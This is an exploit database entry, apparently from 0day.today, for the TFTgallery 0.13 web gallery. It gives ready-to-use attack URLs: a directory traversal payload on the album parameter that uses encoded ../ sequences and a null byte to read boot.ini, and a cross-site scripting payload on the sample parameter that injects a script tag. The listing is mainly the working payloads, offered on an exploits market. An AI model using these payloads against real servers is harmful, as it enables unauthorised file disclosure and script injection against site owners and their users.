[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TFTgallery .13 Directory Traversal Exploit

Author
Blake
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9964
Category
web applications
Date add
02-11-2009
Platform
unsorted
==========================================
TFTgallery .13 Directory Traversal Exploit
==========================================

Released information about the album parameter being vulnerable to XSS
earlier. Seems there are other similar issues:
 
The album parameter is vulnerable to directory transversal
 
http://example.com/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1<http://192.168.1.130/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1>
 
The sample parameter is vulnerable to XSS
 
http://example.com/tftgallery/settings.php?sample='></link><script>alert('blake
XSS test')</script>&name=cucumber%20cool
<http://192.168.1.130/tftgallery/settings.php?sample=>



#  0day.today [2024-11-16]  #